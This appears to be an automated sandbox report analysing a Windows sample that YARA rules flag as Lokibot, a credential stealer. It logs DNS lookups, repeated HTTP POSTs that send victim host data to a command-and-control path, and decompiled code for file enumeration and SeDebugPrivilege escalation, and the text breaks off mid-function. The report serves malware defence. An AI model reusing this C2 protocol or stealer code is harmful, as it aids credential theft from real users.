                        Dec 4, 2021 23:40:25.426904917 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.427032948 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.427285910 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.427331924 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.452235937 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.553580999 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.579066038 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.579268932 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.584317923 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.609769106 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.609910011 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.635215998 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.847377062 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.847559929 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.847645998 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.873150110 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.761544943 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.787653923 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.787765980 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.790426016 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.815903902 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.816095114 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.827552080 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.827702045 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.827722073 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.827779055 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.853832006 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.797764063 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.823947906 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.824559927 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.827279091 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.853244066 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.856611013 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.868113041 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.868171930 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.868345022 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.868428946 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.894344091 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.819633961 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.845372915 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.845504045 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.848169088 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.873876095 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.874062061 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.886748075 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.886892080 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.887314081 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.887382030 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.912643909 CET8049768212.32.237.90192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 4, 2021 23:40:25.106108904 CET6454953192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:25.134881973 CET53645498.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:26.530941963 CET6315353192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:26.550316095 CET53631538.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:27.739684105 CET5299153192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:27.760241985 CET53529918.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:28.773323059 CET5370053192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:28.793174028 CET53537008.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:29.799994946 CET5172653192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:29.817958117 CET53517268.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Dec 4, 2021 23:40:25.106108904 CET192.168.2.48.8.8.80x905aStandard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:26.530941963 CET192.168.2.48.8.8.80x60daStandard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:27.739684105 CET192.168.2.48.8.8.80xd8e0Standard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:28.773323059 CET192.168.2.48.8.8.80x48faStandard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:29.799994946 CET192.168.2.48.8.8.80x402aStandard query (0)naourl.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Dec 4, 2021 23:40:25.134881973 CET8.8.8.8192.168.2.40x905aNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:26.550316095 CET8.8.8.8192.168.2.40x60daNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:27.760241985 CET8.8.8.8192.168.2.40xd8e0No error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:28.793174028 CET8.8.8.8192.168.2.40x48faNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:29.817958117 CET8.8.8.8192.168.2.40x402aNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • naourl.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449752212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:25.169298887 CET540OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 190
                        Connection: close
                        Dec 4, 2021 23:40:25.195162058 CET541OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: 'ckav.rujones216041DESKTOP-716T771k08F9C4E9C79A3B52B3F739430P15iq
                        Dec 4, 2021 23:40:25.426904917 CET667INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:25 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2c169730-5553-11ec-a6f5-1bd523c5916e; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:32 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.449765212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:26.584317923 CET1166OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 190
                        Connection: close
                        Dec 4, 2021 23:40:26.609910011 CET1166OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: 'ckav.rujones216041DESKTOP-716T771+08F9C4E9C79A3B52B3F739430FQRo5
                        Dec 4, 2021 23:40:26.847377062 CET1167INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:26 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2cf1b194-5553-11ec-a729-1bd5acd08a42; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:33 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.449766212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:27.790426016 CET1168OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:27.816095114 CET1168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones216041DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        Dec 4, 2021 23:40:27.827552080 CET1168INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:27 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2da4e8c2-5553-11ec-baa8-1bd5fde30033; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:34 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.449767212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:28.827279091 CET1169OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:28.856611013 CET1169OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones216041DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        Dec 4, 2021 23:40:28.868113041 CET1170INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:28 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2e4366f0-5553-11ec-96cd-1bd532dae4ba; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:35 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.449768212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:29.848169088 CET1171OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:29.874062061 CET1171OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones216041DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        Dec 4, 2021 23:40:29.886748075 CET1171INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:29 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2edefc6e-5553-11ec-a477-1bd561088fd5; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:36 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Start time:23:40:22
                        Start date:04/12/2021
                        Path:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\rfxJzZjiWv.exe"
                        Imagebase:0x400000
                        File size:106496 bytes
                        MD5 hash:8ED7E6B478CF0C00934BB42E3BDF5E20
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >

                          Executed Functions

                          C-Code - Quality: 85%
                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				struct _WIN32_FIND_DATAW _v596;
                          				void* __ebx;
                          				void* _t35;
                          				int _t43;
                          				void* _t52;
                          				int _t56;
                          				intOrPtr _t60;
                          				void* _t66;
                          				void* _t73;
                          				void* _t74;
                          				WCHAR* _t98;
                          				void* _t99;
                          				void* _t100;
                          				void* _t101;
                          				WCHAR* _t102;
                          				void* _t103;
                          				void* _t104;
                          
                          				L004067C4(0xa); // executed
                          				_t72 = 0;
                          				_t100 = 0x2e;
                          				_t106 = _a16;
                          				if(_a16 == 0) {
                          					L15:
                          					_push(_a8);
                          					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                          					_t104 = _t103 + 0xc;
                          					if(_t98 == 0) {
                          						L30:
                          						__eflags = 0;
                          						return 0;
                          					}
                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                          					_t73 = _t35;
                          					if(_t73 == 0xffffffff) {
                          						L29:
                          						E00402BAB(_t98);
                          						goto L30;
                          					}
                          					L17:
                          					while(1) {
                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                          							if(_v596.dwFileAttributes != 0x10) {
                          								L21:
                          								_push( &(_v596.cFileName));
                          								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                          								_t104 = _t104 + 0xc;
                          								if(_t101 == 0) {
                          									goto L24;
                          								}
                          								if(_a12 == 0) {
                          									E00402BAB(_t98);
                          									E00403BEF(_t73);
                          									return _t101;
                          								}
                          								_a12(_t101);
                          								E00402BAB(_t101);
                          								goto L24;
                          							}
                          							_t124 = _a20;
                          							if(_a20 == 0) {
                          								goto L24;
                          							}
                          							goto L21;
                          						} else {
                          							L24:
                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                          							if(_t43 == 0) {
                          								E00403BEF(_t73); // executed
                          								goto L29;
                          							}
                          							_t100 = 0x2e;
                          							continue;
                          						}
                          					}
                          				}
                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                          				if(_t102 == 0) {
                          					L14:
                          					_t100 = 0x2e;
                          					goto L15;
                          				}
                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                          				_t74 = _t52;
                          				if(_t74 == 0xffffffff) {
                          					L13:
                          					E00402BAB(_t102);
                          					_t72 = 0;
                          					goto L14;
                          				} else {
                          					goto L3;
                          				}
                          				do {
                          					L3:
                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                          						goto L11;
                          					}
                          					if(_a24 == 0) {
                          						L7:
                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                          							L9:
                          							_push( &(_v596.cFileName));
                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                          							_t103 = _t103 + 0xc;
                          							_a16 = _t60;
                          							_t115 = _t60;
                          							if(_t60 == 0) {
                          								goto L11;
                          							}
                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                          							E00402BAB(_a16);
                          							_t103 = _t103 + 0x1c;
                          							if(_t99 != 0) {
                          								E00402BAB(_t102);
                          								E00403BEF(_t74);
                          								return _t99;
                          							}
                          							goto L11;
                          						}
                          						_t66 = 0x2e;
                          						_t114 = _v596.cFileName - _t66;
                          						if(_v596.cFileName == _t66) {
                          							goto L11;
                          						}
                          						goto L9;
                          					}
                          					_push(L"Windows");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					_push(L"Program Files");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					goto L7;
                          					L11:
                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                          				} while (_t56 != 0);
                          				E00403BEF(_t74); // executed
                          				goto L13;
                          			}




















                          0x00403d82
                          0x00403d88
                          0x00403d8c
                          0x00403d8d
                          0x00403d90
                          0x00403ea9
                          0x00403ea9
                          0x00403eb9
                          0x00403ebb
                          0x00403ec0
                          0x00403f95
                          0x00403f95
                          0x00000000
                          0x00403f95
                          0x00403ece
                          0x00403edb
                          0x00403edd
                          0x00403ee2
                          0x00403f8e
                          0x00403f8f
                          0x00000000
                          0x00403f94
                          0x00000000
                          0x00403ee8
                          0x00403ef8
                          0x00403f0a
                          0x00403f12
                          0x00403f18
                          0x00403f26
                          0x00403f28
                          0x00403f2d
                          0x00000000
                          0x00000000
                          0x00403f33
                          0x00403f76
                          0x00403f7c
                          0x00000000
                          0x00403f83
                          0x00403f36
                          0x00403f3a
                          0x00000000
                          0x00403f40
                          0x00403f0c
                          0x00403f10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403f41
                          0x00403f41
                          0x00403f4b
                          0x00403f58
                          0x00403f5c
                          0x00403f88
                          0x00000000
                          0x00403f8d
                          0x00403f60
                          0x00000000
                          0x00403f60
                          0x00403ef8
                          0x00403ee8
                          0x00403da3
                          0x00403da9
                          0x00403ea6
                          0x00403ea8
                          0x00000000
                          0x00403ea8
                          0x00403db7
                          0x00403dc4
                          0x00403dc6
                          0x00403dcb
                          0x00403e9d
                          0x00403e9e
                          0x00403ea4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403dd1
                          0x00403dd1
                          0x00403dd8
                          0x00000000
                          0x00000000
                          0x00403de2
                          0x00403e12
                          0x00403e22
                          0x00403e30
                          0x00403e36
                          0x00403e3f
                          0x00403e44
                          0x00403e47
                          0x00403e4a
                          0x00403e4c
                          0x00000000
                          0x00000000
                          0x00403e63
                          0x00403e65
                          0x00403e6a
                          0x00403e6f
                          0x00403f64
                          0x00403f6a
                          0x00000000
                          0x00403f71
                          0x00000000
                          0x00403e6f
                          0x00403e26
                          0x00403e27
                          0x00403e2e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e2e
                          0x00403dea
                          0x00403df9
                          0x00000000
                          0x00000000
                          0x00403e01
                          0x00403e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e75
                          0x00403e7f
                          0x00403e8c
                          0x00403e8e
                          0x00403e97
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows
                          • API String ID: 1690352074-2009209621
                          • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                          • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                          				void* _v8;
                          				struct _LUID _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				struct _TOKEN_PRIVILEGES _v32;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				int _t16;
                          				int _t31;
                          				void* _t32;
                          
                          				_t31 = 0;
                          				E004060AC();
                          				_t32 = __eax;
                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                          				if(_t14 != 0) {
                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                          					if(_t16 != 0) {
                          						_push(__ebx);
                          						_v32.Privileges = _v16.LowPart;
                          						_v32.PrivilegeCount = 1;
                          						_v24 = _v16.HighPart;
                          						_v20 = 2;
                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                          						_t31 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_v8);
                          					return _t31;
                          				}
                          				return _t14;
                          			}













                          0x00406512
                          0x00406514
                          0x00406522
                          0x00406524
                          0x00406530
                          0x00406534
                          0x0040653f
                          0x0040654e
                          0x00406552
                          0x0040655a
                          0x0040655f
                          0x0040656d
                          0x00406570
                          0x00406573
                          0x0040657a
                          0x00406589
                          0x0040658d
                          0x00406590
                          0x00406594
                          0x00000000
                          0x0040659a
                          0x004065a1

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 3615134276-2896544425
                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B7C(long _a4) {
                          				void* _t4;
                          				void* _t7;
                          
                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                          				_t7 = _t4;
                          				if(_t7 != 0) {
                          					E00402B4E(_t7, 0, _a4);
                          				}
                          				return _t7;
                          			}





                          0x00402b8c
                          0x00402b92
                          0x00402b96
                          0x00402b9e
                          0x00402ba3
                          0x00402baa

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E0040648B(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				void* __ebx;
                          				void* _t12;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				void* _t20;
                          				void* _t23;
                          				intOrPtr _t25;
                          				void* _t28;
                          				void* _t30;
                          
                          				_t23 = 0x1a;
                          				_t11 =  ==  ? _t23 : _a20;
                          				_t12 = E00403C90(__edi, _a16, _a12, _a8,  ==  ? _t23 : _a20);
                          				_t30 = _t12;
                          				if(_t30 == 0) {
                          					return _t12;
                          				}
                          				_t13 = E004031E5(0, 5, 0xdb5f7604, 0, 0); // executed
